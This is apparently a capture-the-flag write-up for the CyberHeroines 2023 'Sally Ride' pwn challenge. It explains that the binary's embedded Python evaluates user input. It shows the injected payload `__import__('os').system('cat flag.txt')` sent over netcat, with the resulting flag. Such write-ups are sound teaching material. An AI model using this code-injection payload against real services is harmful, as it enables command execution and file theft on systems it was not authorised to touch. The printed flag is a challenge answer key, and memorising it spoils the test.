# CyberHeroines 2023

## Sally Ride

> [Sally Kristen Ride](https://en.wikipedia.org/wiki/Sally_Ride) (May 26, 1951
> – July 23, 2012) was an American astronaut and physicist. Born in Los
> Angeles, she joined NASA in 1978, and in 1983 became the first American
> woman and the third woman to fly in space, after cosmonauts Valentina
> Tereshkova in 1963 and Svetlana Savitskaya in 1982. She was the youngest
> American astronaut to have flown in space, having done so at the age of 32.
> - [Wikipedia Entry](https://en.wikipedia.org/wiki/Sally_Ride)  
>  
> Chal: I asked ChatGPT to build this binary to honor my hero, the [first
> American woman](https://www.youtube.com/watch?v=jwu-zSdNiLI) in space, but
> its broken and I cannot seem to figure out why. Connect to `0.cloud.chals.io
> 10568` and help me return the flag.  
>  
> Author: [TJ](https://www.tjoconnor.org/)  
>  
> [`chal.bin`](https://raw.githubusercontent.com/D13David/ctf-
> writeups/main/cyberheroines23/pwn/sally_ride/chal.bin)

Tags: _pwn_

## Solution  
We are getting a binary for this challenge. Lets see what's going on. The
`main` is very short. It uses the [`Python/C
API`](https://docs.python.org/3/c-api/index.html) to execute embedded python.

```c  
undefined8 main(void)  
{  
logo();  
Py_Initialize();  
PyRun_SimpleStringFlags  
("def main():\n superhero_name = input(\"Who is your hero >>> \")\n
print(\"Your hero name is:\", superhero_name)\n\nif __name__ ==
\"__main__\":\n main()\n"  
,0);  
Py_Finalize();  
return 0;  
}  
```

The embedded python script is also where short. Interestingly with the input
prompt we have the possibility to inject python code.

```python  
def main():  
superhero_name = input("Who is your hero >>> ")  
print("Your hero name is:", superhero_name)  
  
if __name__ == "__main__":  
main()  
```

What we can do is to input `__import__('os').system('cat flag.txt')` as
superhero name and python will happily execute this code and print the flag
out.

```bash  
$ nc 0.cloud.chals.io 10568  
\--------------------------------------------------------------------------------

WWWWNNXXXXXXXXXXNNWWW  
WWNXK0OkkxxxxddddddxxxxkkO0KXNWW  
WWXK0kxddddddddddddddddddddddddddxk0KXWW  
WWX0kxddddddddddddddddddddddddddddddddddxk0XWW  
WX0kxddddddddddddddddddddddddddddddddddddddddxk0XW  
WXOxddddddddddddddddddddddddddddddddddddddddddddddxOXW  
WXOxdddddddddddddddddddddddxxxxdddddddddddddddddddddddxOXW  
N0xdddddddddddddddddddxk0KKXXXXXXKK0kxdddddddddddddddddddx0N  
WXkddddddddddddddddddxOKNW WNKOxddddddddddddddddddkXW  
WKxdddddddddddddddddxOXWW WXOxdddddddddddddddddxKW  
W0xdddddddddddddddddkKW WWWWWW WKkdddddddddddddddddx0W  
W0xdddddddddddddddddxKW WX0OkkkkO0XW WKkdddddddddddddddddx0W  
WKxdddddddddddddddddx0W WNOxddddddddxON W0xdddddddddddddddddxKW  
WXkddddddddddddddddddkXWW WNOddddddddddddON XkddddddddddddddddddkN  
W0xddddddddddddddddddxO000000OxddddddddddddkXW Xkddddddddddddddddddx0W  
NkdddddddddddddddddddddddddddddddddddddddddON XkdddddddddddddddddddON  
XxdddddddddddddddddddddddddddddddddddddddxOXW W0xdddddddddddddddddddxX  
WKxdddddddddddddddddddddddddddddddddddddk0XW WXkddddddddddddddddddddxKW  
W0xdddddddddddddddddddddddddddddddddxO0KNW WKkdddddddddddddddddddddd0W  
W0xddddddddddddddddddddddddddddddddkKW WXOxddddddddddddddddddddddx0W  
WKxdddddddddddddddddddddddddddddddONW WNKOxddddddddddddddddddddddddxKW  
XkddddddddddddddddddddddddddddddkXW WX0kdddddddddddddddddddddddddddkX  
NOdddddddddddddddddddddddddddddd0W WKkdddddddddddddddddddddddddddddON  
WKxdddddddddddddddddddddddddddddkKKKXXKKKOdddddddddddddddddddddddddddddxKW  
N0xddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddx0N  
NOddddddddddddddddddddddddddddxkkkkkkkkxddddddddddddddddddddddddddddON  
WXkddddddddddddddddddddddddddd0NWWWWWWN0dddddddddddddddddddddddddddkXW  
WXkdddddddddddddddddddddddddd0W W0ddddddddddddddddddddddddddOXW  
WNOxdddddddddddddddddddddddd0W W0ddddddddddddddddddddddddxONW  
WKkdddddddddddddddddddddddOXXXXXXXXOdddddddddddddddddddddddkKW  
WXOxddddddddddddddddddddddxxxxxxxxddddddddddddddddddddddxOXW  
WXOxddddddddddddddddddddddddddddddddddddddddddddddddxOXW  
WX0kddddddddddddddddddddddddddddddddddddddddddddk0XW  
WNKOxddddddddddddddddddddddddddddddddddddddxOKNW  
WNK0kxddddddddddddddddddddddddddddddxk0KNW  
WWNK0OkxxddddddddddddddddddxxkO0KNWW  
WWNXKK00OOOOOOOOOO00KKXNWW  
WWWWWW

\--------------------------------------------------------------------------------  
I would like to be remembered as someone who was not afraid to do what  
she wanted to do, and as someone who took risks along the way in order to  
achieve her goals. - Dr. Sally Ride  
\--------------------------------------------------------------------------------  
Who is your hero >>> __import__('os').system('cat flag.txt')  
chctf{u_cant_B_Wh4t_u_caNT_S33}  
('Your hero name is:', 0)  
```

Flag `chctf{u_cant_B_Wh4t_u_caNT_S33}`

Original writeup (https://github.com/D13David/ctf-
writeups/blob/main/cyberheroines23/pwn/sally_ride/README.md).